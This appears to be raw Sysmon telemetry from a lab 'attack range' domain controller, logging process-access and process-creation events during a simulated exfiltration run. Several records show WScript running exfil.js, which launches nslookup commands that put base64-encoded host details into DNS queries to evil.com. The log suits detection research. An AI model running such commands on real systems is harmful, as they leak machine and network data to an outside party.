14:16:30.896{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200192Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.896{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200191Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.896{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200190Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.896{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200189Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.896{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-5C40-000000005F02}4660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200188Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.896{2E1864BB-17A1-629A-783D-000000005F02}55523192C:\Windows\System32\WScript.exe{2E1864BB-17BE-629A-5C40-000000005F02}4660C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200187Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.904{2E1864BB-17BE-629A-5C40-000000005F02}4660C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A TUFDQWRkcmVzczogMDI6RjA6NEI6MUU6QUM6Q0E= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcxtux.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200186Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.896{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlpdei.tmpMD5=1672107762ECEA7286E9D317B1D4872B,SHA256=4B917B4BC62A2EA4AC7C36E28B121764EAC51D071330300C02B5F6C0A7A1F19F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200185Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.865{2E1864BB-17BE-629A-5A40-000000005F02}17887280C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-5B40-000000005F02}7432C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200184Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.849{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200183Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.849{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200182Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.849{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200181Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.849{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200180Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.849{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-5B40-000000005F02}7432C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200179Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.849{2E1864BB-17BE-629A-5940-000000005F02}32922428C:\Windows\system32\cmd.exe{2E1864BB-17BE-629A-5B40-000000005F02}7432C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200178Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.860{2E1864BB-17BE-629A-5B40-000000005F02}7432C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BE-629A-5940-000000005F02}3292C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpdei.tmp 2>&1 10341000x8000000000000000200177Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.833{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BE-629A-5A40-000000005F02}1788C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200176Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.833{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BE-629A-5A40-000000005F02}1788C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200175Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.818{2E1864BB-17BE-629A-5A40-000000005F02}17887280C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-5940-000000005F02}3292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200174Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.796{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-5A40-000000005F02}1788C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200173Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.796{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200172Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.796{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200171Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.796{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200170Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.796{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200169Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.796{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BE-629A-5940-000000005F02}3292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000200168Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.796{2E1864BB-17A1-629A-783D-000000005F02}55525904C:\Windows\System32\WScript.exe{2E1864BB-17BE-629A-5940-000000005F02}3292C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000200167Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.797{2E1864BB-17BE-629A-5940-000000005F02}3292C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A SVB2NjogZmU4MDo6ZmMwMzpjOWUyOmIwNjg6OWY3MQ== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlpdei.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000200166Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.780{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlmsz.tmpMD5=E9933BFC1563034EF92711FFD1FA59E4,SHA256=B289486696E542D49274648AF69BCDC051FA9206A6157EC32F57F8442A56EBEC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000200165Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.749{2E1864BB-17BE-629A-5740-000000005F02}59922380C:\Windows\system32\conhost.exe{2E1864BB-17BE-629A-5840-000000005F02}5556C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200164Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:30.734{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000200163Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 